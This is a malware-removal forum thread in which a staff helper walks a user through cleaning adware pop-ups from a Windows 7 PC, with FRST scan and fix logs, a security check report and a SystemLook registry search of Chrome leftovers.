Task: {D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D} - \Norton Internet Security\Norton Error Processor No Task File <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2014-01-01 13:21 - 2012-09-18 15:27 - 00192512 _____ () C:\Windows\System32\zlhp1020.dll
2014-01-02 20:18 - 2012-09-18 15:27 - 00065024 _____ () C:\Windows\system32\spool\PRTPROCS\x64\pphp1020.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2012-08-30 13:46 - 2014-04-08 08:13 - 00069120 _____ () C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
2011-08-10 20:58 - 2011-08-10 20:58 - 00627304 _____ () C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
2009-08-14 10:55 - 2009-08-14 10:55 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2011-10-06 17:53 - 2011-10-06 17:53 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2012-02-20 20:29 - 2012-02-20 20:29 - 00087912 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-02-20 20:28 - 2012-02-20 20:28 - 01242472 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2013-05-08 14:52 - 2013-05-08 14:52 - 01270464 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\kpcengine.2.3.dll
2013-06-17 12:35 - 2013-06-17 12:35 - 00478400 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\dblite.dll
2012-08-30 13:39 - 2014-04-08 08:08 - 00112128 _____ () C:\Program Files (x86)\Canon\ImageBrowser EX\MFMFileSystemWatcher.dll
2011-08-10 20:57 - 2011-08-10 20:57 - 00151656 _____ () C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyHook.dll
2014-02-23 08:01 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2014-10-21 17:22 - 2014-10-21 17:22 - 00750080 _____ () C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2015-01-23 18:05 - 2015-01-23 18:05 - 00043008 _____ () c:\users\bonnie\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpr4zdmj.dll
2014-10-21 17:22 - 2014-10-21 17:22 - 00047616 _____ () C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\libEGL.dll
2014-10-21 17:22 - 2014-10-21 17:22 - 00863744 _____ () C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\plugins\platforms\qwindows.dll
2014-10-21 17:22 - 2014-10-21 17:22 - 00200704 _____ () C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\plugins\imageformats\qjpeg.dll
2015-01-20 22:29 - 2015-01-20 22:29 - 03925104 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Admin (S-1-5-21-2977827394-2594518940-965070511-1008 - Administrator - Enabled) => C:\Users\Admin
Administrator (S-1-5-21-2977827394-2594518940-965070511-500 - Administrator - Disabled)
ASPNET (S-1-5-21-2977827394-2594518940-965070511-1004 - Limited - Enabled)
Bonnie (S-1-5-21-2977827394-2594518940-965070511-1000 - Limited - Enabled) => C:\Users\Bonnie
Guest (S-1-5-21-2977827394-2594518940-965070511-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2977827394-2594518940-965070511-1007 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/23/2015 06:06:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/22/2015 08:23:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (01/23/2015 06:05:01 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
BHDrvx64

Error: (01/22/2015 08:22:06 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
BHDrvx64

Error: (01/22/2015 08:20:41 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The WerSvc service was unable to log on as NT AUTHORITY\SYSTEM with the currently configured password due to the following error:
%%1352

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (01/22/2015 08:13:11 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.

Error: (01/22/2015 08:13:11 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #10 on: January 23, 2015, 07:43:02 PM »
Checkup:
 Results of screen317's Security Check version 0.99.95 
 Windows 7 Service Pack 1 x64 (UAC is enabled) 
 Internet Explorer 11 
``````````````Antivirus/Firewall Check:``````````````
 Windows Security Center service is not running! This report may not be accurate!
 Windows Firewall Enabled! 
Kaspersky Internet Security   
 Antivirus up to date!   
`````````Anti-malware/Other Utilities Check:`````````
 VirusTotal Uploader 2.2   
 Java 64-bit 8 Update 31 
 Adobe Flash Player 16.0.0.257 
 Adobe Reader 10.1.13 Adobe Reader out of Date! 
 Mozilla Firefox (35.0)
````````Process Check: objlist.exe by Laurent````````
 Symantec Norton Online Backup NOBuAgent.exe 
 Kaspersky Lab Kaspersky Internet Security 14.0.0 avp.exe 
 Kaspersky Lab Kaspersky Internet Security 14.0.0 avpui.exe 
 Kaspersky Lab Kaspersky Internet Security 14.0.0 x64 wmi64.exe
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 1%
````````````````````End of Log``````````````````````

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #11 on: January 24, 2015, 04:20:57 AM »
Thanks for those logs, still work to do....

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.
NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

Next,

Pause Kaspersky Internet Security, instructions at the following link: (also turn off the internet connection whilst KIS is off)

http://support.kaspersky.com/us/11463#block0

Next,

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt) or the folder it was run from. Please post it to your reply.

Next,

Turn KIS back on, also re-connect to internet....

Adobe Reader is outdated...
Visit http://get.adobe.com/uk/reader/otherversions/ and download the latest version of Acrobat Reader

Step 1 - Select your Operating System.
Step 2 - Select your Language.
Step 3 - Select latest version.

Untick the option for any security scanner or toolbar if offered.

Download and install.

Having the latest updates ensures there are no security vulnerabilities in your system.

Next,

We need to uninstall Google Chrome (it is corrupt). First, back up important bookmarks. Instructions at the following link:

http://www.wikihow.com/Export-Bookmarks-from-Chrome (also includes how to import saved bookmarks)

Next,

Uninstall Chrome, instructions here: https://support.google.com/chrome/answer/95319?hl=en-GB

Next,

Re-install Chrome: https://www.google.com/intl/en_uk/chrome/browser/desktop/index.html

Install AdBlockPlus https://chrome.google.com/webstore/detail/adblock-plus/cfhdojbkjhnklbpkdaibdccddilifddb

Post the log from FRST (Fixlog.txt); also let me know if there are any remaining issues or concerns...

Thank you,

Kevin...

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #12 on: January 24, 2015, 09:12:17 AM »
Ok, I ran the fix and updated Adobe Reader.  The funny thing is that I uninstalled Google Chrome before I made my first post here at SpywareHammer.  I just checked again, and there is no Google Chrome in the Programs and Features for me to uninstall.

I uninstalled Chrome before because I noticed that the tOPDeals extension kept re-installing itself.

Here is the log you requested.
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 19-01-2015
Ran by Admin at 2015-01-24 07:51:02 Run:2
Running from C:\Users\Admin\Desktop
Loaded Profiles: Bonnie & Admin (Available profiles: Bonnie & Admin)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
ShortcutTarget: Dropbox.lnk -> C:\Users\Admin\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BHO: caoupoNpEaK -> {01050D05-D546-B8DC-954D-8334A8A7BF5A} -> C:\ProgramData\caoupoNpEaK\_1Y.x64.dll No File
BHO: AudioCeonvaeert -> {2F344960-763E-9E6C-E973-25241A34D54E} -> C:\ProgramData\AudioCeonvaeert\mRE8_SdP.x64.dll No File
BHO: DiscounntLoCaatOr -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} -> C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll No File
BHO: SaoftiCoup -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} -> C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll No File
BHO: PrinCECCoupon -> {B4552D3D-6B41-9AF1-3067-72A066972344} -> C:\ProgramData\PrinCECCoupon\jsih.x64.dll No File
S1 BHDrvx64; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\BASHDefs\20120711.002\BHDrvx64.sys [X]
S3 NAVENG; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\ENG64.SYS [X]
S3 NAVEX15; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\EX64.SYS [X]
C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpr4zdmj.dll
Task: {3E4DBC7D-7F19-4D96-BC4B-4539E3201C58} - \Norton Internet Security\Norton Error Analyzer No Task File <==== ATTENTION
Task: {D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D} - \Norton Internet Security\Norton Error Processor No Task File <==== ATTENTION
Emptytemp:
end



*****************

HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir => value deleted successfully.
C:\Users\Admin\AppData\Roaming\Dropbox\bin\Dropbox.exe not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt1" => Key deleted successfully.
HKCR\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt2" => Key deleted successfully.
HKCR\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt3" => Key deleted successfully.
HKCR\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt4" => Key deleted successfully.
HKCR\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt1" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt2" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt3" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{01050D05-D546-B8DC-954D-8334A8A7BF5A}" => Key deleted successfully.
"HKCR\CLSID\{01050D05-D546-B8DC-954D-8334A8A7BF5A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2F344960-763E-9E6C-E973-25241A34D54E}" => Key deleted successfully.
"HKCR\CLSID\{2F344960-763E-9E6C-E973-25241A34D54E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}" => Key deleted successfully.
"HKCR\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-aaa1-bf9c473dd360}" => Key deleted successfully.
"HKCR\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4552D3D-6B41-9AF1-3067-72A066972344}" => Key deleted successfully.
"HKCR\CLSID\{B4552D3D-6B41-9AF1-3067-72A066972344}" => Key deleted successfully.
BHDrvx64 => Service deleted successfully.
NAVENG => Service deleted successfully.
NAVEX15 => Service deleted successfully.
"C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpr4zdmj.dll" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3E4DBC7D-7F19-4D96-BC4B-4539E3201C58}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3E4DBC7D-7F19-4D96-BC4B-4539E3201C58}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security\Norton Error Analyzer" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security\Norton Error Processor" => Key deleted successfully.
EmptyTemp: => Removed 19.8 MB temporary data.


The system needed a reboot.

==== End of Fixlog 07:51:03 ====

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #13 on: January 24, 2015, 03:37:37 PM »
One last task before we clean up:

Please download SystemLook from the following link below and save it to your Desktop. Use the correct version 32bit or 64bit.

http://jpshortstuff.247fixes.com/SystemLook_x64.exe     <<-   64 bit….

http://images.malwareremoval.com/jpshortstuff/SystemLook.exe  <<-  32 bit

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:

Code:
:regfind
Chrome
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #14 on: January 26, 2015, 10:13:09 PM »
Here are the results of the SystemLook scan:

SystemLook 30.07.11 by jpshortstuff
Log created at 21:11 on 26/01/2015 by Admin
Administrator - Elevation successful

========== regfind ==========

Searching for "Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML\DefaultIcon]
@="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome]
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome]
@="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationName"="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationIcon"="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationDescription"="Google Chrome is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Google Chrome."
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".xhtml"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".xht"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".shtml"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".html"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".htm"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".webp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\Startmenu]
"StartMenuInternet"="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"webcal"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"urn"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"tel"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"smsto"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"sms"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"nntp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"news"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"mms"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"mailto"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"irc"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"https"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"http"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"ftp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\DefaultIcon]
@="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ShowIconsCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --show-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"HideIconsCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --hide-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ReinstallCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --make-default-browser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
@=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe""
[HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome]
[HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\blbkdnmdcafmfhinpmnlhhddbepgkeaa]
"path"="https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\chrome.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8C2B16D45B229185FAF5CA80FF685341]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko21\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E439EB5942B5D95BB46059CFB35F12D]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko15\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\99C23E7B2CCCCEA5C802285262A6A938]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko17\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A4184B7DF8252A95CA0F19922FFF8199]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko18\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5116180163EA8357A2A927DB0793BD6]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A84F8442960E64A50AE400A82615FF21]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko23\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A854C73A823A8AB54AEE82FD34ED6173]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko19\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B20F76182E9C3855AA1DFFD4371FB6BF]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\vkcrxreg.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B6BADFE24F767A05791574919AFE46D1]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko22\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B9372B03F6651655E827482E21F329EB]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\locales\en\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BAA0CFC47908FDF5A9354B1366451030]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko21\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BB9EDEE95B068B353AD4B0324B6EAA25]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko18\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BC23558C3E8E2BC5E8C850480C058D3A]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko17\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C151A29D1CBA2D451997FF16B4A7E4E9]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\locales\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C5A18BC58BCF0F5589C469C52A9BE823]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\content_blocker_chrome_registrar.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C85900C7F5AD46E53B18F40833116F9E]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko19\"
